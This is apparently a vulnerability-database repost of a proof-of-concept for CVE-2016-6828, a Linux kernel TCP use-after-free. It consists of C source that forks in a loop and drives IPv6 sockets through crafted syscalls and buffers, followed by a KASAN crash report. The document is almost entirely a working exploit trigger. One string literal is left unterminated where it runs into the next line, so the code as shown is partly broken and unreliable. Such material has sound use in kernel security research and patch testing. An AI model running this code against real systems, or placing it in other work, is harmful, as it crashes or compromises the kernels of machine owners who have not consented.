Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Linux Kernel TCP Related Read Use-After-Free

Related Vulnerabilities: CVE-2016-6828  
Publish Date: 09 Nov 2016
Author: Marco Grassi
Source 
                							

                // Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html
 
// to build clang derp4.c -o derp4 -static
 
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>
 
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
 
long r[62];
 
 
int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();
 
        if (pid == 0) {
        r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);
        memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128);
        r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
        r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        memcpy((void*)0x20012f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 165);
        memcpy((void*)0x20020000, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28);
        r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);
        *(uint32_t*)0x20001fff = (uint32_t)0x2;
        r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);
        r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
        *(uint32_t*)0x20018000 = (uint32_t)0x4;
        r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);
        *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;
        *(uint32_t*)0x2000dfd0 = (uint32_t)0xc;
        *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;
        *(uint64_t*)0x2000dfe0 = (uint64_t)0x1;
        *(uint64_t*)0x2000dfe8 = (uint64_t)0x0;
        *(uint64_t*)0x2000dff0 = (uint64_t)0x0;
        *(uint32_t*)0x2000dff8 = (uint32_t)0x4;
        *(uint16_t*)0x2000e000 = (uint16_t)0x0;
        *(uint16_t*)0x2000e002 = (uint16_t)0x0;
        *(uint32_t*)0x2000e004 = (uint32_t)0xffff;
        *(uint32_t*)0x2000e008 = (uint32_t)0x401;
        *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;
        *(uint64_t*)0x20000008 = (uint64_t)0x37;
        *(uint32_t*)0x2000ed3a = (uint32_t)0x14;
        *(uint16_t*)0x2000ed3e = (uint16_t)0x2;
        *(uint16_t*)0x2000ed40 = (uint16_t)0x12;
        *(uint32_t*)0x2000ed42 = (uint32_t)0x1f;
        *(uint32_t*)0x2000ed46 = (uint32_t)0x7;
        *(uint8_t*)0x2000ed4a = (uint8_t)0x6;
        *(uint8_t*)0x2000ed4b = (uint8_t)0x100;
        *(uint8_t*)0x2000ed4c = (uint8_t)0x3f;
        *(uint32_t*)0x2000ed4d = (uint32_t)0x11;
        *(uint16_t*)0x2000ed51 = (uint16_t)0x0;
        *(uint16_t*)0x2000ed53 = (uint16_t)0x808;
        *(uint32_t*)0x2000ed55 = (uint32_t)0x1;
        *(uint32_t*)0x2000ed59 = (uint32_t)0x0;
        *(uint8_t*)0x2000ed5d = (uint8_t)0x0;
        *(uint32_t*)0x2000ed5e = (uint32_t)0x12;
        *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;
        *(uint16_t*)0x2000ed64 = (uint16_t)0x200;
        *(uint32_t*)0x2000ed66 = (uint32_t)0x5;
        *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;
        *(uint8_t*)0x2000ed6e = (uint8_t)0x9;
        *(uint8_t*)0x2000ed6f = (uint8_t)0x1;
        r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);
        *(uint16_t*)0x20001003 = (uint16_t)0x1;
        *(uint8_t*)0x20001005 = (uint8_t)0x0;
        *(uint32_t*)0x20001007 = (uint32_t)0x9;
        r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);
        memcpy((void*)0x20015285, "\xed\xe0\xf1\x03\xbd\x1d\xe2\x8d\x13\x62\xc9\x11\xde\x3b\x55\xb1\xb2\x26\x95\xb2\x3f\x32\x96\x8a\x3d\xf7\xd4\x2c\xd9\x32\xae\x05\x9a\x60\x09\xbc\x49\x63\x6a\x45\xd5\x6f\xa8\x4b\xaf\x8a\x66\xf3\x35\xad\xe6\x68\x85\xd4\x7e\xe5\x7c\x7e\x06\xbf\x32\xfb\xf9\xd2\x9f\x40\xa3\x0a\xa0\x93\x09\x73\x39\x7d\xac\x3c\x8d\x83\xe0\x0c\x5e\xa2\x36\x9b\x9c\xb4\x62\xe8\x39\x07\xd8\x71\xc1\x2f\x6f\x18\xfa\x8a\x5d\x06\xb4\x46\xa2\x97\x79\x81\xb2\x85\xd4\x4f\x6b\x48\xc4\xf5\xdd\xa8\x8d\x10\x74\x01\xe1\x58\xb2\x82\x72\xc4\xb6\xb2\xf7\xaa\x90\x9c\x9f\x61\x95\x87\x7b\x99\xc5\xa5\x53\xbc\xab\xdb\xdb\x5e\x32\xb8\xc3\xee\xd3\xda\x7a\xf2\x5c\xc5\x1a\xf1\xd6\x1b\x53\xad\x24\xd0\xa0\xc0\x0d\x73\x9e\x81\x7e\x4e\x82\xf5\xa9\x73\x3c\x7a\x5c\x6e\x4c\x48\x7d\x42\xf5\x2f\x68\xf9\x7e\xa9\xd8\x6a\x64\x78\x08\x7a\x37\xe9\xd3\x81\x15\x34\x63\x63\x14\xb7\x1a\x43\x9b\x4f\x85\xfa\x88\x5c\xe1\x1e\xce\x87\x95\xe1\x81\xc8\x06\xaf\x1a\x64\x26\x36\x83\x36\xef\x71\x0c\x2a\xda\xe4\xff\xa1\x87\xc2\x04\x96\x1c\x72\xd9\x2d\xf0\xce\x46\xd4\x3a\xd1\xc7\x2f\x60\x25\xf8\x33\x1f\x38\x7a\x46\xb1\x43\xa4\xd2\x65\x77\x47\x85\xe9\xad\x52\xdb\x8b\x93\x23\xf1\xf9\xa9\x5f\xe4\xf8\x39\x82\xc5\xb4\xe1\x5b\x87\xa0\xfd\x2c\xc2\x84\x15\x78\xaa\x9b\x3f\xe5\x75\x6e\x05\xef\x84\x4c\x6b\x9d\x1d\x9e\x7c\x92\x3b\x55\xcb\x01\x6f\xc5\x9a\xd8\xc3\x91\x39\x95\xd7\x8f\xe9\x87\x15\x27\xe7\x19\xa8\x18\x24\xfd\x09\x11\x49\x41\xc6\xd2\xe9\x1a\xf4\xb0\x9b\x85\x9b\x3f\xb1\xf3\xc3\x48\xc5\xe7\x45\x0b\x21\x2d\x32\x27\x92\x3c\x39\x52\x0f\x2b\xdf\x52\x66\x6f\x01\x8f\xdc\xfa\x8f\x5e\x53\xb7\x82\x23\x79\xfa\x28\xe5\x24\xa7\x5e\x2a\x24\x7e\xd0\x1e\xd5\x1a\xb6\xb8\xe5\xb2\x6d\x4d\x38\x61\x79\xb8\xd1\x27\x92\x63\x0c\xed\x3c\xf1\x13\x98\x37\xfa\x98\xda\x0c\x1a\x86\xd1\x6a\x12\x86\x2f\xd0\x8d\x8e\x2e\x52\x23\xac\x2d\x82\x59\xef\x17\xbc\xf1\x47\xfb\xf0\x5f\x43\x70\x99\x14\xdf\xaf\x44\x02\xb5\xe9\x39\x51\x8e\xf2\x07\x9c\xa2\x39\xab\x07\xa2\x22\xa7\xd3\x5c\xc0\x8c\xcf\x3c\xa2\xa7\xd0\xd6\xf4\x82\xcc\x35\x75\x3a\x20\xb7\x9b\xf3\x9d\xd9\xfe\xdf\x1e\x3f\x55\xf2\x99\xdb\xd0\xb2\xd7\x86\xc1\xfa\xb3\xc7\x99\xdc\x02\xe3\x9f\xfd\x1e\x56\xc1\xf2\x51\x32\x84\x61\x30\x33\xf6\xe3\x82\x9f\xf2\x04\xaf\x5d\xf4\x3d\xa6\x0e\x25\x53\xe9\x05\x7c\x42\xbf\xfa\x97\xd7\x77\x8c\x8f\x29\x7a\xcb\x40\x13\x07\xb5\x8d\x69\xdc\x8b\x35\xd3\xb6\xf3\xd8\x07\x94\x7e\x69\x0f\xb7\x28\xf1\xb3\x45\x60\x37\x65\xa4\xf6\xbf\x9c\xb3\xf9\x3d\xe1\x08\x08\xc9\x76\x5e\x8b\x7f\x26\x01\x9d\x8f\x15\x39\x02\xfe\x8a\xe3\x3b\x8b\xf9\xae\x06\x04\xef\x0d\xcf\x67\x24\x54\xe6\x4c\xe4\x05\x8e\xd7\xda\x4c\xf2\xd7\x88\x75\x87\xf7\x7e\xd0\x49\x19\x02\x5e\x00\xc4\xeb\x3e\xec\x70\x35\x9c\x9b\xc9\xd9\x47\x65\x4c\xa3\xdb\x0e\xde\x1e\x76\x58\x27\xe0\x91\x6b\xf9\x25\x44\xa6\xa2\x85\x8f\x50\xd0\x13\x88\x57\x25\x56\x78\xed\xcb\x6b\xec\xf2\x4f\xd4\xce\xf1\x90\xcd\x49\x50\xb5\xcf\xd3\x96\x4d\x3c\xf4\x54\x8e\xa9\xdb\xd3\xb5\x9e\xe9\x87\x19\x8b\x59\xd7\xf2\xcf\x1a\xd3\x70\xca\x42\xc6\x97\x66\x38\x24\x39\x4d\x42\xa1\xf0\x24\x46\xe4\x0e\x9c\xbc\xc4\x53\xa9\xb9\x94\x4d\xca\x48\xa6\x04\xb8\x2f\x4f\xf5\x85\x32\x22\xf8\x4e\x83\xab\x34\x27\x3b\x8f\x24\x48\x15\x9b\xa9\xf8\xb9\xb7\xcb\xd5\xfb\x72\xec\x7a\xc3\x39\x9c\xde\x25\x76\x08\x3f\x49\x35\xbd\x42\x4f\x3f\x5e\xfc\x6b\x6b\x9e\x3e\x34\x47\x62\xed\x5a\xae\xdc\xcf\x4e\xe6\x18\xfa\x7f\xe6\x46\xc8\xbe\xbc\x42\x88\xb6\xfe\xbd\x96\x85\x5a\x4a\x1d\xd2\x00\xe9\x71\x48\x48\x52\xd6\xf5\x88\x7d\x94\x18\xf6\xf0\x5c\x0a\x39\x29\xc8\x78\xa0\xa8\x44\xf4\xb6\xca\x78\x75\x4a\xf7\x53\xd7\x7e\x23\xaf\x6b\xf9\xcd\x77\xb2\xd0\x37\x29\x9c\x57\xbe\x9e\x5f\x7c\xe4\x41\x59\xde\xd5\x63\x02\x2a\xc0\x74\xa6\x00\xe2\x8f\x83\x30\xc1\x60\xcd\xb3\xca\x44\x1d\x88\x54\x8b\xbc\xa8\x79\x78\x86\xa2\x49\x7c\x94\x49\xf3\xb4\x41\x44\x76\x33\xf1\x2e\x71\xbc\xa1\x39\xb9\x68\x56\xd9\xa0\xa1\x6f\xdc\x7d\xa3\xb8\x4f\x1c\xb8\x19\x26\x42\x88\x0e\xcb\xbb\xc9\x6c\xa8\xf8\xe9\x37\x86\x61\x37\x9f\xba\xb3\x9e\x54\x07\xe6\xff\x6f\x54\x8c\xcf\x7e\x3d\x14\xfd\x94\xbb\xdc\x59\x5d\x22\x86\xb5\x3b\x18\x0d\x08\xad\x15\x67\x6b\xf1\xc8\xd8\x81\xac\x14\x63\xcf\x1e\xf9\x48\xba\xe0\x33\x4c\x1e\x72\xe9\x00\x1a\x48\xc5\xb4\x2c\x71\xd6\x7a\x0b\x8f\x6c\x02\x9a\x02\xa9\x20\xbd\x8a
        r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);
        r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        *(uint32_t*)0x20022fdd = (uint32_t)0x28;
        *(uint32_t*)0x20022fe1 = (uint32_t)0x400;
        *(uint64_t*)0x20022fe5 = (uint64_t)0x0;
        *(uint64_t*)0x20022fed = (uint64_t)0x8ab;
        *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;
        *(uint16_t*)0x20022ffd = (uint16_t)0x5;
        r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);
        } else if (pid > 0) {
            int returnStatus;
            waitpid(pid, &returnStatus, 0);
            printf("collected child\n");
        } else {
            printf("fork failed\n");
            exit(1);
        }
    }
    return 0;
}
 
 
// KASAN report on v4.8-rc1, equivalent on master
 
/*
[   21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428
[   21.447953] Read of size 4 by task rsyslogd/1612
[   21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G    B           4.8.0-rc1 #1
[   21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   21.450270]  0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151
[   21.451135]  ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400
[   21.452002]  ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400
[   21.452873] Call Trace:
[   21.453142]  <IRQ>  [<ffffffff81bef151>] dump_stack+0x83/0xb2
[   21.453835]  [<ffffffff815d0351>] kasan_object_err+0x21/0x70
[   21.454450]  [<ffffffff815d05f4>] kasan_report_error+0x204/0x500
[   21.455135]  [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70
[   21.455899]  [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.456624]  [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.457329]  [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120
[   21.458028]  [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0
[   21.458590]  [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0
[   21.459189]  [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0
[   21.459804]  [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0
[   21.460540]  [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20
[   21.461237]  [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0
[   21.461865]  [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210
[   21.462581]  [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0
[   21.463167]  [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0
[   21.463884]  [<ffffffff815cfaa5>] ? memcpy+0x45/0x50
[   21.464414]  [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0
[   21.465057]  [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240
[   21.465719]  [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0
[   21.466326]  [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0
[   21.466954]  [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120
[   21.467591]  [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410
[   21.468231]  [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0
[   21.468836]  [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550
[   21.469462]  [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0
[   21.470179]  [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0
[   21.470953]  [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50
[   21.471600]  [<ffffffff82b8396a>] ip6_input+0xda/0x1f0
[   21.472149]  [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90
[   21.472870]  [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50
[   21.473521]  [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0
[   21.474210]  [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0
[   21.474858]  [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340
[   21.475487]  [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750
[   21.476043]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.476615]  [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20
[   21.477332]  [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50
[   21.478956]  [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500
[   21.479618]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.480250]  [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0
[   21.481017]  [<ffffffff812092c0>] ? update_curr+0x150/0x4e0
[   21.481700]  [<ffffffff82937c90>] ? netdev_info+0x120/0x120
[   21.482339]  [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280
[   21.482969]  [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350
[   21.483619]  [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420
[   21.484295]  [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40
[   21.485101]  [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0
[   21.485739]  [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170
[   21.486383]  [<ffffffff8293e1a7>] process_backlog+0x197/0x580
[   21.487021]  [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0
[   21.487615]  [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0
[   21.488258]  [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20
[   21.488909]  [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110
[   21.489471]  [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30
[   21.490147]  [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340
[   21.490868]  [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d
[   21.491470]  [<ffffffff811769d7>] irq_exit+0x117/0x140
[   21.492035]  [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0
[   21.492712]  [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90
[   21.493378]  <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424
[   21.494277] Allocated:
[   21.494538] PID = 1711
[   21.494801]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.495416]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.495970]  [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0
[   21.496572]  [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20
[   21.497185]  [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0
[   21.497853]  [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0
[   21.498475]  [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790
[   21.499129]  [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10
[   21.499754]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.500371]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.500988]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.501625]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.502249]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.502838]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.503429]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.504144] Freed:
[   21.504368] PID = 1711
[   21.504628]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.505290]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.505879]  [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0
[   21.506501]  [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210
[   21.507128]  [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0
[   21.507752]  [<ffffffff828f3e22>] __kfree_skb+0x22/0x30
[   21.508339]  [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10
[   21.508962]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.509574]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.510194]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.510818]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.511408]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.512003]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.512562]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.513258] Memory state around the buggy address:
[   21.513770]  ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   21.514546]  ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc
[   21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.516114]                                   ^
[   21.516611]  ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.517400]  ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.518203] ==================================================================
*/


<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started